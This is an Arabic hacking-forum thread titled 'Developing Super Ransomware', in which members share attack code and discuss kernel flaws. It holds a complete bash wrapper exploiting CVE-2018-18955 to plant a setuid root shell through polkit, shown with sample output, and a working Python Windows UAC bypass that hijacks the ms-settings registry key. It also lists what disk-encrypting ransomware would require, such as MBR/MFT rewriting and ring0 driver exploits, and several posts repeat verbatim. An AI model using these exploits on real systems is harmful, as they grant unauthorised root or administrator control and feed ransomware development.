[ نقاش ] تطوير Super Ransomware
- بادئ الموضوع Hallaj.Hack
- تاريخ البدء
احدى الثغرات الجديده في kernel ubuntu
Bash:
#!/bin/sh # wrapper for Jann Horn's exploit for CVE-2018-18955 # uses polkit technique # --- # [email protected]:~/kernel-exploits/CVE-2018-18955$ ./exploit.polkit.sh # [*] Compiling... # [*] Creating /usr/share/polkit-1/actions/subuid.policy... # [.] starting # [.] setting up namespace # [~] done, namespace sandbox set up # [.] mapping subordinate ids # [.] subuid: 165536 # [.] subgid: 165536 # [~] done, mapped subordinate ids # [.] executing subshell # [*] Launching pkexec... # [+] Success: # -rwsrwxr-x 1 root root 8384 Dec 29 14:22 /tmp/sh # [*] Cleaning up... # [*] Launching root shell: /tmp/sh # [email protected]:~/kernel-exploits/CVE-2018-18955# id # uid=0(root) gid=0(root) groups=0(root),1001(test) rootshell="/tmp/sh" policy="subuid.policy" command_exists() { command -v "${1}" >/dev/null 2>/dev/null } if ! command_exists gcc; then echo '[-] gcc is not installed' exit 1 fi if ! command_exists /usr/bin/pkexec; then echo '[-] pkexec is not installed' exit 1 fi if ! command_exists /usr/bin/newuidmap; then echo '[-] newuidmap is not installed' exit 1 fi if ! command_exists /usr/bin/newgidmap; then echo '[-] newgidmap is not installed' exit 1 fi if ! test -w .; then echo '[-] working directory is not writable' exit 1 fi echo "[*] Compiling..." if ! gcc subuid_shell.c -o subuid_shell; then echo 'Compiling subuid_shell.c failed' exit 1 fi if ! gcc subshell.c -o subshell; then echo 'Compiling gcc_subshell.c failed' exit 1 fi if ! gcc rootshell.c -o "${rootshell}"; then echo 'Compiling rootshell.c failed' exit 1 fi echo "[*] Creating /usr/share/polkit-1/actions/${policy}..." echo '<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE policyconfig PUBLIC "-//freedesktop//DTD PolicyKit Policy Configuration 1.0//EN" "http://www.freedesktop.org/standards/PolicyKit/1/policyconfig.dtd"> <policyconfig> <action id="org.freedesktop.policykit.exec"> <defaults> <allow_any>yes</allow_any> <allow_inactive>yes</allow_inactive> <allow_active>yes</allow_active> </defaults> </action> </policyconfig>' > "${policy}" echo "cp ${policy} /usr/share/polkit-1/actions/${policy}" | ./subuid_shell ./subshell if ! test -r "/usr/share/polkit-1/actions/${policy}"; then echo '[-] Failed' /bin/rm "${rootshell}" exit 1 fi echo "[*] Launching pkexec..." /usr/bin/pkexec --disable-internal-agent 2>/dev/null /bin/sh -c "/bin/chown root:root ${rootshell};/bin/chmod u+s ${rootshell}" if ! test -u "${rootshell}"; then echo '[-] Failed' /bin/rm "${rootshell}" exit 1 fi echo '[+] Success:' /bin/ls -la "${rootshell}" echo '[*] Cleaning up...' /bin/rm subuid_shell /bin/rm subshell /bin/rm "${policy}" echo "/bin/rm /usr/share/polkit-1/actions/${policy}" | $rootshell echo "[*] Launching root shell: ${rootshell}" $rootshell
شي طبيعي يجب التعامل مع الهاردوير للوصول للسوفت وير عن طريق الكيرنل
الكيرنل يربط بين الهاردوير والسوفت وير .
وماوضعته هوا اضافة مستخدم ليصبح روت مثله كمثل اعطاء تصاريح للمستخدم . او مانسميه
مافي شيئ جديد الفروق بين لينكس وويندز بالشكل والمصطلح .!
الكيرنل عباره عن استقبال وارسال فتح ممرات بين الهاردوير والسوفت وير .
لكن ماوضعته من ثغره لا ارها سوى اضافة مستخدم جديد مع تصاريح كامله .!
Creating /usr/share/polkit-1/actions/subuid.policy
برامج الاختراق تفعل ذالك . والفايروسات ايضآ .
لكن نصل للكيرنل عشان نقوم بالتعديلات ؟
اذا تم العبث بالكيرنل لن ترى الذاكره ولا حتى booting
ماوضعته اعطاء امتيازات للتحكم الكامل . بالنظام يعني اضافه بدون اذن صاحبه .
اين المشكله ؟
الكيرنل يربط بين الهاردوير والسوفت وير .
وماوضعته هوا اضافة مستخدم ليصبح روت مثله كمثل اعطاء تصاريح للمستخدم . او مانسميه
مافي شيئ جديد الفروق بين لينكس وويندز بالشكل والمصطلح .!
الكيرنل عباره عن استقبال وارسال فتح ممرات بين الهاردوير والسوفت وير .
لكن ماوضعته من ثغره لا ارها سوى اضافة مستخدم جديد مع تصاريح كامله .!
Creating /usr/share/polkit-1/actions/subuid.policy
برامج الاختراق تفعل ذالك . والفايروسات ايضآ .
لكن نصل للكيرنل عشان نقوم بالتعديلات ؟
اذا تم العبث بالكيرنل لن ترى الذاكره ولا حتى booting
ماوضعته اعطاء امتيازات للتحكم الكامل . بالنظام يعني اضافه بدون اذن صاحبه .
اين المشكله ؟
هذا انا استخدمه لويندوز 10 .
لا تقل ايضآ هيا ثغره ؟
Python:
import os
import sys
import ctypes
import winreg
cmd = "C:\windows\System32\cmd.exe"
def create_reg_key(key, value):
try:
winreg.CreateKey(winreg.HKEY_CURRENT_USER, 'Software\Classes\ms-settings\shell\open\command')
registry_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, 'Software\Classes\ms-settings\shell\open\command', 0, winreg.KEY_WRITE)
winreg.SetValueEx(registry_key, key, 0, winreg.REG_SZ, value)
winreg.CloseKey(registry_key)
except WindowsError:
raise
def exec_bypass_uac(cmd):
try:
create_reg_key('DelegateExecute', '')
create_reg_key(None, cmd)
except WindowsError:
raise
def bypass_uac():
try:
current_dir = os.path.dirname(os.path.realpath(__file__)) + '\\' + __file__
exec_bypass_uac(cmd)
os.system(r'C:\windows\system32\ComputerDefaults.exe')
return 1
except WindowsError:
sys.exit(1)
if __name__ == '__main__':
if bypass_uac():
print("Enjoy your Admin Shell :)")
uac لاتحتاج لـ ثغرة في kernel الويندوز يتم استغلال برامج تشتغل كـ ادمن ولكن بدون ظهور uac داخل الويندوز مثل ComputerDefaults.exe , eventvwr.exe ويوجد الكثير غيرهم
في linux مثل الثغرة الي وضعتها انا بالاعلى يتم استغلال خطأ داخل احدى الدوال في kernel الـ linux والدالة الي تم استغلالها هنا هي map_write() داخل user_namespace.c
واضح ان الثغره في ملف user_namespace.c
لكن الوصول للثغره يتطلب التطبيق على الجهاز local ,
Linux source code: kernel/user_namespace.c (v5.2.8) - Bootlin
هذا كيرنال لينكس
لكن الوصول للثغره يتطلب التطبيق على الجهاز local ,
C:
static ssize_t map_write(struct file *file, const char __user *buf,
size_t count, loff_t *ppos,
int cap_setid,
struct uid_gid_map *map,
struct uid_gid_map *parent_map)
هذا كيرنال لينكس
تشفير القرص و نظام شغال عليه اشبه بعمليه قلب مفتوح
مر علي شخص واحد فقط مصري فعلا له قدره برمجياا لعملها
1- انت بحاجه ليس لدرايفر فقط بل لبرمجه نظام تشغيل من صفر
+ تنصيبه برمجيا جنب وندوز
+ حذفه و اصلاح mft & mbr
مهمه نظام تشفير و فك تشفير كل الهارد وعرض رساله ادخال المفتاح
2- انت بحاجه لتوقيع رقمي لدرايفرات ل x64 و ثغرات صلاحيات ring0 لتخطي الحمايات
3- خبره كبيره ف اسمبلي و c
مر علي شخص واحد فقط مصري فعلا له قدره برمجياا لعملها
1- انت بحاجه ليس لدرايفر فقط بل لبرمجه نظام تشغيل من صفر
+ تنصيبه برمجيا جنب وندوز
+ حذفه و اصلاح mft & mbr
مهمه نظام تشفير و فك تشفير كل الهارد وعرض رساله ادخال المفتاح
2- انت بحاجه لتوقيع رقمي لدرايفرات ل x64 و ثغرات صلاحيات ring0 لتخطي الحمايات
3- خبره كبيره ف اسمبلي و c
